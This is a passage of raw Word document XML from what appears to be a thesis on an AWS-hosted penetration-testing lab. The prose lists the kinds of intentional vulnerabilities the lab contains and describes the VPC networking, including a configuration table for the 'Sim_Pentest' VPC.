          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Intentional Vulnerabilities: Known CVEs, outdated software versions, and common misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ECD77B" w14:textId="0D062874" w:rsidR="00313C28" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00024908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom Web Applications: Vulnerable web services for exploitation practice (detailed in section </w:t>
      </w:r>
      <w:r w:rsidR="00445C72" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>5.2 and 5.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC48378" w14:textId="45087C10" w:rsidR="00313C28" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00024908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>System Misconfigurations: Weak permissions, exposed credentials, and insecure services (</w:t>
      </w:r>
      <w:r w:rsidR="00445C72" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>detailed in section 5.2 and 5.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D78808" w14:textId="0CBA123F" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00445C72" w:rsidP="00024908">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The instances use the t</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>2.micro</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance type, which provides sufficient resources for the testing scenarios while minimizing costs. All instances are configured with public IP addresses (Elastic IPs or auto-assigned public IPs) to enable direct internet access for testing external attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42260531" w14:textId="2A999467" w:rsidR="008478B2" w:rsidRPr="00D77DFE" w:rsidRDefault="008478B2" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc223521109"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00445C72" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Networking in AWS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:r w:rsidR="00E07016" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC2F2D" w14:textId="695C0A1B" w:rsidR="009E63C2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E63C2" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Having established the overall architecture and objectives, this section details the specific networking configurations used to implement this design. The following tables </w:t>
      </w:r>
      <w:r w:rsidR="00705F6E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">in this chapter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>document the exact parameters for the VPC, subnets, and route tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FC08DE" w14:textId="524E6D6A" w:rsidR="00DC6CCC" w:rsidRPr="00D77DFE" w:rsidRDefault="00B3299B" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS provides several </w:t>
      </w:r>
      <w:r w:rsidR="00CC5E2A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">primary </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">components required to build the testing scenario. The </w:t>
      </w:r>
      <w:r w:rsidR="005D6083" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>VPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, which forms the core of the environment, includes key elements critical for structuring the network and supporting the simulation</w:t>
      </w:r>
      <w:r w:rsidR="00E821A4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in</w:t>
      </w:r>
      <w:r w:rsidR="00176715" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure </w:t>
      </w:r>
      <w:r w:rsidR="005D6083" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00B8099D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6083" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00CE78DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>All configuration details are presented in Table</w:t>
      </w:r>
      <w:r w:rsidR="00AA6640" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CE78DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.1</w:t>
      </w:r>
      <w:r w:rsidR="00AA6640" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00CE78DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> through 4.9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3113B5" w14:textId="77777777" w:rsidR="00B8099D" w:rsidRPr="00D77DFE" w:rsidRDefault="005D6083" w:rsidP="00B8099D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C2201E5" wp14:editId="6E67D788">
            <wp:extent cx="5581650" cy="3211032"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="59396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0000" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5619044" cy="3232544"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E134E3" w14:textId="020D632B" w:rsidR="00317F9F" w:rsidRPr="00D77DFE" w:rsidRDefault="00B8099D" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 4.2: AWS architecture of network traffic</w:t>
      </w:r>
      <w:r w:rsidR="00512AA9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DED5CD4" w14:textId="06017C62" w:rsidR="00D401CC" w:rsidRPr="00D77DFE" w:rsidRDefault="00D401CC" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 4.1</w:t>
      </w:r>
      <w:r w:rsidR="00645C0D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Configuration of the VPC</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4223"/>
        <w:gridCol w:w="4270"/>
      </w:tblGrid>
      <w:tr w:rsidR="0075289C" w:rsidRPr="00D77DFE" w14:paraId="5A96DBC9" w14:textId="77777777" w:rsidTr="00DC6CCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="304D6C26" w14:textId="42170435" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C" w:rsidP="00DC6CCC">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="253AC4A6" w14:textId="6D647B2E" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075289C" w:rsidRPr="00D77DFE" w14:paraId="61A308A5" w14:textId="77777777" w:rsidTr="00DC6CCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="687A92CC" w14:textId="51EC3B6B" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="415E81B6" w14:textId="6F93CBEA" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sim_Pentest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075289C" w:rsidRPr="00D77DFE" w14:paraId="106B7405" w14:textId="77777777" w:rsidTr="00DC6CCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="468F8080" w14:textId="51219190" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C"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State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A41912F" w14:textId="40A82E29" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C"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Available</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075289C" w:rsidRPr="00D77DFE" w14:paraId="4A32E444" w14:textId="77777777" w:rsidTr="00DC6CCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="054EA349" w14:textId="3DDF87B5" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DNS Resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34DAD53A" w14:textId="58AD798B" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075289C" w:rsidRPr="00D77DFE" w14:paraId="1E1CEA79" w14:textId="77777777" w:rsidTr="00DC6CCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D6BE883" w14:textId="5CDE9F69" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IPV4 CIDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC39AF8" w14:textId="42082722" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C"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10.0.0.0/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075289C" w:rsidRPr="00D77DFE" w14:paraId="7C41D23E" w14:textId="77777777" w:rsidTr="00DC6CCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="565BD748" w14:textId="2C1F6762" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C"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Main network ACL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C5ECF42" w14:textId="1B386CBF" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NACL_Subnet_1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25201236" w14:textId="77777777" w:rsidR="0075289C" w:rsidRPr="00D77DFE" w:rsidRDefault="0075289C" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB480C3" w14:textId="5D177B3D" w:rsidR="00B3299B" w:rsidRPr="00D77DFE" w:rsidRDefault="00B3299B" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The VPC contains four public subnets</w:t>
      </w:r>
      <w:r w:rsidR="00412647" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this work</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Although no NAT Gateways are used, each subnet is assigned a distinct Network ACL to enhance realism. These ACL configurations are explained further in </w:t>
      </w:r>
      <w:r w:rsidR="00A60096" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
